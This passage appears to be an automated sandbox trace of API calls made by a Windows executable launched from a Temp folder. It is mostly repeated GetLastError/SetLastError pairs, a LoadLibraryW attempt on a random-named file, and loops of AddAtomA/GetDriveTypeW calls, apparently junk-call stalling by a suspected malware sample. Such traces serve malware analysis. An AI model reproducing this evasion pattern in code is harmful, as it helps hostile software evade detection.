xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x91\xfd\xfd\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0095.300] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError 
(dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError 
(dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError 
(dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.307] GetLastError () returned 0x0 [0095.307] SetLastError (dwErrCode=0x0) [0095.307] GetLastError () returned 0x0 [0095.307] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError 
(dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError 
(dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError 
(dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError 
(dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError 
(dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError 
(dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.744] SetLastError (dwErrCode=0x0) [0095.744] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0095.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0095.744] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) 
returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] 